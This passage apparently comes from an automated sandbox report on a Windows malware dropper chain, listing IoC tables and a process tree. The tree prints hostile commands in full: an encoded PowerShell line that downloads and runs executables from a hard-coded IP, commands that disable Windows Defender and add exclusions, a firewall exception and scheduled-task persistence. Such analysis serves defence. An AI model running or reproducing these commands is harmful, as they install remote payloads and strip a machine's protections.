4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
2160	inst77player.exe
2160	inst77player.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
940	powershell.exe
940	powershell.exe
940	powershell.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
4352	TrainJX2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3380	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	2780	._cache_Synaptics.exe
Token: SeDebugPrivilege	2680	XClient.exe
Token: SeDebugPrivilege	2680	XClient.exe
Token: SeDebugPrivilege	960	64.exe
Token: SeDebugPrivilege	4088	RuntimeBroker.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	4352	TrainJX2.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	4852	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4848	WMIC.exe
Token: SeSecurityPrivilege	4848	WMIC.exe
Token: SeTakeOwnershipPrivilege	4848	WMIC.exe
Token: SeLoadDriverPrivilege	4848	WMIC.exe
Token: SeSystemProfilePrivilege	4848	WMIC.exe
Token: SeSystemtimePrivilege	4848	WMIC.exe
Token: SeProfSingleProcessPrivilege	4848	WMIC.exe
Token: SeIncBasePriorityPrivilege	4848	WMIC.exe
Token: SeCreatePagefilePrivilege	4848	WMIC.exe
Token: SeBackupPrivilege	4848	WMIC.exe
Token: SeRestorePrivilege	4848	WMIC.exe
Token: SeShutdownPrivilege	4848	WMIC.exe
Token: SeDebugPrivilege	4848	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4848	WMIC.exe
Token: SeRemoteShutdownPrivilege	4848	WMIC.exe
Token: SeUndockPrivilege	4848	WMIC.exe
Token: SeManageVolumePrivilege	4848	WMIC.exe
Token: 33	4848	WMIC.exe
Token: 34	4848	WMIC.exe
Token: 35	4848	WMIC.exe
Token: 36	4848	WMIC.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeIncreaseQuotaPrivilege	4848	WMIC.exe
Token: SeSecurityPrivilege	4848	WMIC.exe
Token: SeTakeOwnershipPrivilege	4848	WMIC.exe
Token: SeLoadDriverPrivilege	4848	WMIC.exe
Token: SeSystemProfilePrivilege	4848	WMIC.exe
Token: SeSystemtimePrivilege	4848	WMIC.exe
Token: SeProfSingleProcessPrivilege	4848	WMIC.exe
Token: SeIncBasePriorityPrivilege	4848	WMIC.exe
Token: SeCreatePagefilePrivilege	4848	WMIC.exe
Token: SeBackupPrivilege	4848	WMIC.exe
Token: SeRestorePrivilege	4848	WMIC.exe
Token: SeShutdownPrivilege	4848	WMIC.exe
Token: SeDebugPrivilege	4848	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4848	WMIC.exe
Token: SeRemoteShutdownPrivilege	4848	WMIC.exe
Token: SeUndockPrivilege	4848	WMIC.exe
Token: SeManageVolumePrivilege	4848	WMIC.exe
Token: 33	4848	WMIC.exe
Token: 34	4848	WMIC.exe
Token: 35	4848	WMIC.exe
Token: 36	4848	WMIC.exe
Token: SeIncreaseQuotaPrivilege	636	WMIC.exe
Token: SeSecurityPrivilege	636	WMIC.exe
Token: SeTakeOwnershipPrivilege	636	WMIC.exe
Token: SeLoadDriverPrivilege	636	WMIC.exe
Token: SeSystemProfilePrivilege	636	WMIC.exe
Token: SeSystemtimePrivilege	636	WMIC.exe
Token: SeProfSingleProcessPrivilege	636	WMIC.exe
Token: SeIncBasePriorityPrivilege	636	WMIC.exe
Token: SeCreatePagefilePrivilege	636	WMIC.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
1704	EXCEL.EXE
2160	inst77player.exe
2160	inst77player.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1068 wrote to memory of 3380	1068	4363463463464363463463463.exe	86
PID 1068 wrote to memory of 3380	1068	4363463463464363463463463.exe	86
PID 1068 wrote to memory of 3380	1068	4363463463464363463463463.exe	86
PID 1068 wrote to memory of 1516	1068	4363463463464363463463463.exe	88
PID 1068 wrote to memory of 1516	1068	4363463463464363463463463.exe	88
PID 1068 wrote to memory of 1516	1068	4363463463464363463463463.exe	88
PID 1516 wrote to memory of 2780	1516	Synaptics.exe	89
PID 1516 wrote to memory of 2780	1516	Synaptics.exe	89
PID 1516 wrote to memory of 2780	1516	Synaptics.exe	89
PID 2780 wrote to memory of 5048	2780	._cache_Synaptics.exe	95
PID 2780 wrote to memory of 5048	2780	._cache_Synaptics.exe	95
PID 2780 wrote to memory of 5048	2780	._cache_Synaptics.exe	95
PID 5048 wrote to memory of 4088	5048	RuntimeBroker.exe	96
PID 5048 wrote to memory of 4088	5048	RuntimeBroker.exe	96
PID 5048 wrote to memory of 4088	5048	RuntimeBroker.exe	96
PID 2780 wrote to memory of 2680	2780	._cache_Synaptics.exe	97
PID 2780 wrote to memory of 2680	2780	._cache_Synaptics.exe	97
PID 4088 wrote to memory of 4184	4088	RuntimeBroker.exe	99
PID 4088 wrote to memory of 4184	4088	RuntimeBroker.exe	99
PID 4088 wrote to memory of 4184	4088	RuntimeBroker.exe	99
PID 2780 wrote to memory of 960	2780	._cache_Synaptics.exe	101
PID 2780 wrote to memory of 960	2780	._cache_Synaptics.exe	101
PID 960 wrote to memory of 2376	960	64.exe	103
PID 960 wrote to memory of 2376	960	64.exe	103
PID 960 wrote to memory of 4056	960	64.exe	104
PID 960 wrote to memory of 4056	960	64.exe	104
PID 4056 wrote to memory of 4880	4056	cmd.exe	105
PID 4056 wrote to memory of 4880	4056	cmd.exe	105
PID 2780 wrote to memory of 3308	2780	._cache_Synaptics.exe	106
PID 2780 wrote to memory of 3308	2780	._cache_Synaptics.exe	106
PID 2780 wrote to memory of 3308	2780	._cache_Synaptics.exe	106
PID 3308 wrote to memory of 2160	3308	inst77player_1.0.0.1.exe	107
PID 3308 wrote to memory of 2160	3308	inst77player_1.0.0.1.exe	107
PID 3308 wrote to memory of 2160	3308	inst77player_1.0.0.1.exe	107
PID 3380 wrote to memory of 512	3380	._cache_4363463463464363463463463.exe	109
PID 3380 wrote to memory of 512	3380	._cache_4363463463464363463463463.exe	109
PID 3380 wrote to memory of 512	3380	._cache_4363463463464363463463463.exe	109
PID 3380 wrote to memory of 1260	3380	._cache_4363463463464363463463463.exe	110
PID 3380 wrote to memory of 1260	3380	._cache_4363463463464363463463463.exe	110
PID 1260 wrote to memory of 4152	1260	black.exe	111
PID 1260 wrote to memory of 4152	1260	black.exe	111
PID 1260 wrote to memory of 4152	1260	black.exe	111
PID 3380 wrote to memory of 4100	3380	._cache_4363463463464363463463463.exe	113
PID 3380 wrote to memory of 4100	3380	._cache_4363463463464363463463463.exe	113
PID 3380 wrote to memory of 4100	3380	._cache_4363463463464363463463463.exe	113
PID 4100 wrote to memory of 2936	4100	KuwaitSetupHockey.exe	114
PID 4100 wrote to memory of 2936	4100	KuwaitSetupHockey.exe	114
PID 4100 wrote to memory of 2936	4100	KuwaitSetupHockey.exe	114
PID 2780 wrote to memory of 1536	2780	._cache_Synaptics.exe	116
PID 2780 wrote to memory of 1536	2780	._cache_Synaptics.exe	116
PID 2780 wrote to memory of 1536	2780	._cache_Synaptics.exe	116
PID 2780 wrote to memory of 1440	2780	._cache_Synaptics.exe	117
PID 2780 wrote to memory of 1440	2780	._cache_Synaptics.exe	117
PID 2780 wrote to memory of 1440	2780	._cache_Synaptics.exe	117
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 1440 wrote to memory of 5048	1440	xworm.exe	118
PID 5048 wrote to memory of 1984	5048	AppLaunch.exe	121
PID 5048 wrote to memory of 1984	5048	AppLaunch.exe	121

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5148	attrib.exe
2448	attrib.exe
5968	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1068
- C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"
  2⤵
  - Downloads MZ/PE file
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3380
- - C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:512
- - C:\Users\Admin\AppData\Local\Temp\Files\black.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\black.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\black.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\black.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:4152
- - C:\Users\Admin\AppData\Local\Temp\Files\KuwaitSetupHockey.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\KuwaitSetupHockey.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4100
  - - C:\Users\Admin\AppData\Local\Temp\is-PBEGJ.tmp\KuwaitSetupHockey.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-PBEGJ.tmp\KuwaitSetupHockey.tmp" /SL5="$1031A,3849412,851968,C:\Users\Admin\AppData\Local\Temp\Files\KuwaitSetupHockey.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2936
- - C:\Users\Admin\AppData\Local\Temp\Files\system.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\system.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5712
  - - C:\Users\Admin\AppData\Local\Temp\system.exe
      "C:\Users\Admin\AppData\Local\Temp\system.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:844
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1056
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Downloads MZ/PE file
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5048
    - - C:\Users\Admin\AppData\Local\Temp\XenoManager\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XenoManager\RuntimeBroker.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4088
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "RuntimeBroker" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA364.tmp" /F
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2680
  - - C:\Users\Admin\AppData\Local\Temp\Files\64.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\64.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c color 0a
        5⤵
        
        PID:2376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp 936
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Windows\system32\chcp.com
        
        chcp 936
        6⤵
        
        PID:4880
  - - C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3308
    - - C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\inst77player.exe
        
        "C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\inst77player.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2160
  - - C:\Users\Admin\AppData\Local\Temp\Files\jet.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1536
  - - C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1440
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5048
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
        6⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:940
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 236
        5⤵
        Program crash
        
        PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\Files\TrainJX2.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\TrainJX2.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4352
  - - C:\Users\Admin\AppData\Local\Temp\Files\microsoft-onedrive.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\microsoft-onedrive.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4780
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4896
    - - C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        5⤵
        Executes dropped EXE
        
        PID:1712
      - C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        7⤵
        
        PID:4340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        7⤵
        
        PID:4296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:3784
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:1688
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        7⤵
        
        PID:1680
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        8⤵
        
        PID:1056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        7⤵
        
        PID:2928
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        8⤵
        
        PID:3732
        
        C:\Windows\system32\cmd.exe
        
